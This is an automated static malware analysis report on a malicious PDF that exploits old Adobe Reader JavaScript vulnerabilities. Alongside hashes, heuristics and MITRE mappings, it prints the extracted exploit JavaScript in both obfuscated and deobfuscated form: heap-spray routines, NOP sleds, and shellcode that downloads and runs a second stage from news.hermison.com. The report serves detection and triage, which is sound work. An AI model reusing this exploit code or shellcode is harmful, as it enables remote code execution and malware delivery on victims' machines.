Malicious PDF — malware analysis report

Static analysis result for SHA-256 001b674722b383ed…

MALICIOUS

PDF

2.9 KB
MD5: 29e9977f307a4df549b8c10c7a56fb0e SHA-1: f36145b0823f710fcb848608d6e49b24653ea111 SHA-256: 001b674722b383edcb7c73f62a8d9c1fe0618f3dc821f71478acd65cb5a42559
610 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple known vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, CVE-2008-2992) in Adobe Reader. The deobfuscated JavaScript attempts to download a second-stage payload from the URL 'http://news.hermison.com/exe.php?spl=PDF%20(printd'. This indicates a downloader or exploit kit delivery mechanism.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://news.hermison.com/exe.php?spl=PDF%20(printd Referenced by PDF JavaScript
    • http://news.hermison.com/exe.php?spl=PDF%20(EmailInfoReferenced by PDF JavaScript
    • http://news.hermison.com/exe.php?spl=PDF%20(util_printfReferenced by PDF JavaScript
    • http://news.hermison.com/exe.php?spl=PDF%20(GetIconReferenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
dd2c377afb7489b09ff76578317b1c84ad50ced5d661d2b21b7ccb28a6f940b8		 pdf-javascript-stream PDF /JS object 7 at offset 0xDB 28010 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function FhnbODwP(UIJcVLxxYq) { return UIJcVLxxYq.split('!#$').join(""); } eval(FhnbODwP('f!#$u!#$n!#$c!#$t!#$i!#$o!#$n!#$ !#$p!#$r!#$i!#$n!#$t!#$d!#$(!#$)!#${!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$v!#$a!#$r!#$ !#$c!#$h!#$u!#$n!#$k!#$_!#$s!#$i!#$z!#$e!#$,!#$ !#$p!#$a!#$y!#$l!#$o!#$a!#$d!#$,!#$ !#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$;!#$\n!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$c!#$h!#$u!#$n!#$k!#$_!#$s!#$i!#$z!#$e!#$ !#$=!#$ !#$0!#$x!#$8!#$0!#$0!#$0!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$p!#$a!#$y!#$l!#$o!#$a!#$d!#$ !#$=!#$ !#$u!#$n!#$e!#$s!#$c!#$a!#$p!#$e!#$(!#$"!#$%!#$u!#$5!#$4!#$E!#$B!#$%!#$u!#$7!#$5!#$8!#$B!#$%!#$u!#$8!#$B!#$3!#$C!#$%!#$u!#$3!#$5!#$7!#$4!#$%!#$u!#$0!#$3!#$7!#$8!#$%!#$u!#$5!#$6!#$F!#$5!#$%!#$u!#$7!#$6!#$8!#$B!#$%!#$u!#$0!#$3!#$2!#$0!#$%!#$u!#$3!#$3!#$F!#$5!#$%!#$u!#$4!#$9!#$C!#$9!#$%!#$u!#$A!#$D!#$4!#$1!#$%!#$u!#$D!#$B!#$3!#$3!#$%!#$u!#$0!#$F!#$3!#$6!#$%!#$u!#$1!#$4!#$B!#$E!#$%!#$u!#$3!#$8!#$2!#$8!#$%!#$u!#$7!#$4!#$F!#$2!#$%!#$u!#$C!#$1!#$0!#$8!#$%!#$u!#$0!#$D!#$C!#$B!#$%!#$u!#$D!#$A!#$0!#$3!#$%!#$u!#$E!#$B!#$4!#$0!#$%!#$u!#$3!#$B!#$E!#$F!#$%!#$u!#$7!#$5!#$D!#$F!#$%!#$u!#$5!#$E!#$E!#$7!#$%!#$u!#$5!#$E!#$8!#$B!#$%!#$u!#$0!#$3!#$2!#$4!#$%!#$u!#$6!#$6!#$D!#$D!#$%!#$u!#$0!#$C!#$8!#$B!#$%!#$u!#$8!#$B!#$4!#$B!#$%!#$u!#$1!#$C!#$5!#$E!#$%!#$u!#$D!#$D!#$0!#$3!#$%!#$u!#$0!#$4!#$8!#$B!#$%!#$u!#$0!#$3!#$8!#$B!#$%!#$u!#$C!#$3!#$C!#$5!#$%!#$u!#$7!#$2!#$7!#$5!#$%!#$u!#$6!#$D!#$6!#$C!#$%!#$u!#$6!#$E!#$6!#$F!#$%!#$u!#$6!#$4!#$2!#$E!#$%!#$u!#$6!#$C!#$6!#$C!#$%!#$u!#$4!#$3!#$0!#$0!#$%!#$u!#$5!#$C!#$3!#$A!#$%!#$u!#$2!#$E!#$5!#$5!#$%!#$u!#$7!#$8!#$6!#$5!#$%!#$u!#$0!#$0!#$6!#$5!#$%!#$u!#$C!#$0!#$3!#$3!#$%!#$u!#$0!#$3!#$6!#$4!#$%!#$u!#$3!#$0!#$4!#$0!#$%!#$u!#$0!#$C!#$7!#$8!#$%!#$u!#$4!#$0!#$8!#$B!#$%!#$u!#$8!#$B!#$0!#$C!#$%!#$u!#$1!#$C!#$7!#$0!#$%!#$u!#$8!#$B!#$A!#$D!#$%!#$u!#$0!#$8!#$4!#$0!#$%!#$u!#$0!#$9!#$E!#$B!#$%!#$u!#$4!#$0!#$8!#$B!#$%!#$u!#$8!#$D!#$3!#$4!#$%!#$u!#$7!#$C!#$4!#$0!#$%!#$u!#$4!#$0!#$8!#$B!#$%!#$u!#$9!#$5!#$3!#$C!#$%!#$u!#$8!#$E!#$B!#$F!#$%!#$u!#$0!#$E!#$4!#$E!#$%!#$u!#$E!#$8!#$E!#$C!#$%!#$u!#$F!#$F!#$8!#$4!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$E!#$C!#$8!#$3!#$%!#$u!#$8!#$3!#$0!#$4!#$%!#$u!#$2!#$4!#$2!#$C!#$%!#$u!#$F!#$F!#$3!#$C!#$%!#$u!#$9!#$5!#$D!#$0!#$%!#$u!#$B!#$F!#$5!#$0!#$%!#$u!#$1!#$A!#$3!#$6!#$%!#$u!#$7!#$0!#$2!#$F!#$%!#$u!#$6!#$F!#$E!#$8!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$8!#$B!#$F!#$F!#$%!#$u!#$2!#$4!#$5!#$4!#$%!#$u!#$8!#$D!#$F!#$C!#$%!#$u!#$B!#$A!#$5!#$2!#$%!#$u!#$D!#$B!#$3!#$3!#$%!#$u!#$5!#$3!#$5!#$3!#$%!#$u!#$E!#$B!#$5!#$2!#$%!#$u!#$5!#$3!#$2!#$4!#$%!#$u!#$D!#$0!#$F!#$F!#$%!#$u!#$B!#$F!#$5!#$D!#$%!#$u!#$F!#$E!#$9!#$8!#$%!#$u!#$0!#$E!#$8!#$A!#$%!#$u!#$5!#$3!#$E!#$8!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$8!#$3!#$F!#$F!#$%!#$u!#$0!#$4!#$E!#$C!#$%!#$u!#$2!#$C!#$8!#$3!#$%!#$u!#$6!#$2!#$2!#$4!#$%!#$u!#$D!#$0!#$F!#$F!#$%!#$u!#$7!#$E!#$B!#$F!#$%!#$u!#$E!#$2!#$D!#$8!#$%!#$u!#$E!#$8!#$7!#$3!#$%!#$u!#$F!#$F!#$4!#$0!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$F!#$F!#$5!#$2!#$%!#$u!#$E!#$8!#$D!#$0!#$%!#$u!#$F!#$F!#$D!#$7!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$7!#$4!#$6!#$8!#$%!#$u!#$7!#$0!#$7!#$4!#$%!#$u!#$2!#$F!#$3!#$A!#$%!#$u!#$6!#$E!#$2!#$F!#$%!#$u!#$7!#$7!#$6!#$5!#$%!#$u!#$2!#$E!#$7!#$3!#$%!#$u!#$6!#$5!#$6!#$8!#$%!#$u!#$6!#$D!#$7!#$2!#$%!#$u!#$7!#$3!#$6!#$9!#$%!#$u!#$6!#$E!#$6!#$F!#$%!#$u!#$6!#$3!#$2!#$E!#$%!#$u!#$6!#$D!#$6!#$F!#$%!#$u!#$6!#$5!#$2!#$F!#$%!#$u!#$6!#$5!#$7!#$8!#$%!#$u!#$7!#$0!#$2!#$E!#$%!#$u!#$7!#$0!#$6!#$8!#$%!#$u!#$7!#$3!#$3!#$F!#$%!#$u!#$6!#$C!#$7!#$0!#$%!#$u!#$5!#$0!#$3!#$D!#$%!#$u!#$4!#$6!#$4!#$4!#$%!#$u!#$3!#$2!#$2!#$5!#$%!#$u!#$2!#$8!#$3!#$0!#$%!#$u!#$7!#$2!#$7!#$0!#$%!#$u!#$6!#$E!#$6!#$9!#$%!#$u!#$6!#$4!#$7!#$4!#$%!#$u!#$0!#$0!#$2!#$9!#$"!#$)!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$ !#$=!#$ !#$u!#$n!#$e!#$s!#$c!#$a!#$p!#$e!#$(!#$"!#$%!#$u!#$0!#$d!#$0!#$d!#$%!#$u!#$0!#$d!#$0!#$d!#$"!#$)!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$w!#$h!#$i!#$l!#$e!#$ !#$(!#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$.!#$l!#$e!#$n!#$g!#$t!#$h!#$ !#$<!#$ !#$c!#$h!#$u!#$n!#$k!#$_!#$s!#$i!#$z!#$e!#$)!#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$ !#$+!#$=!#$ !#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#
... (truncated)
legacy_pdfkit_stage_000.js
540b0fa3cb579288a05725e4bf54079a05d5fecbcfcdcc972a826af9ce9dc861		 deobfuscated-js split-join delimiter stripped JavaScript at offset 0x10C 7508 bytes
Detection
ClamAV: Pdf.Exploit.Agent-35646
Obfuscation or payload: likely
Carved artifact contains 13 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function FhnbODwP(UIJcVLxxYq) { return UIJcVLxxYq.split('').join(""); } eval(FhnbODwP('function printd(){\n        var chunk_size, payload, nopsled;\n\n        chunk_size = 0x8000;\n        payload = unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6E2F%u7765%u2E73%u6568%u6D72%u7369%u6E6F%u632E%u6D6F%u652F%u6578%u702E%u7068%u733F%u6C70%u503D%u4644%u3225%u2830%u7270%u6E69%u6474%u0029");\n        nopsled = unescape("%u0d0d%u0d0d");\n        while (nopsled.length < chunk_size)nopsled += nopsled;\n        nopsled_len = chunk_size - (payload.length + 20);        \n        nopsled = nopsled.substring(0, nopsled_len);\n        heap_chunks = new Array();\n        for (var i = 0 ; i < 1200 ; i++)heap_chunks[i] = nopsled + payload;\n\n        util.printd("1.000000000000000000000000 : 0000000", new Date());\n        try {\n                media.newPlayer(null);\n        } catch(e) {}\n        util.printd("1.000000000000000000000000 : 0000000", new Date());\n} \n\nfunction emailinfo() {\n        function fix_it(yarsp,len) {\n                while(yarsp.length*2<len) { yarsp+=yarsp; }\n                yarsp=yarsp.substring(0,len/2);\n                return yarsp; \n        }\n        var shellcode=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6E2F%u7765%u2E73%u6568%u6D72%u7369%u6E6F%u632E%u6D6F%u652F%u6578%u702E%u7068%u733F%u6C70%u503D%u4644%u3225%u2830%u6D45%u6961%u496C%u666E%u296F%u0000");\n        var mem_array=new Array();\n        var cc=0x0c0c0c0c;\n        var addr=0x400000;\n        var sc_len=shellcode.length*2;\n        var len=addr-(sc_len+0x38);\n        var yarsp=unescape("%u9090%u9090");\n        yarsp=fix_it(yarsp,len);\n        var count2=(cc-0x400000)/addr;\n        for(var count=0;count<count2;count++) {\n                mem_array[count]=yarsp+shellcode; \n        }\n        var overflow=unescape("%u0c0c%u0c0c");\n        while(overflow.length<44952) {overflow+=overflow; }\n        this.collabStore=Collab.collectEmailInfo( { subj:"",msg:overflow } ); \n}\nfunction util_printf() {\n        var payload = unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6E2F%u7765%u2E73%u6568%u6D72%u7369%u6E6F%u632E%u6D6F%u652F%u6578%u702E%u7068%u733F%u6C70%u503D%u4644%u3225%u2830%u7475%u6C69%u705F%u6972%u746E%u2966%u0000");\n        var nop ="";\n        for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u90
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.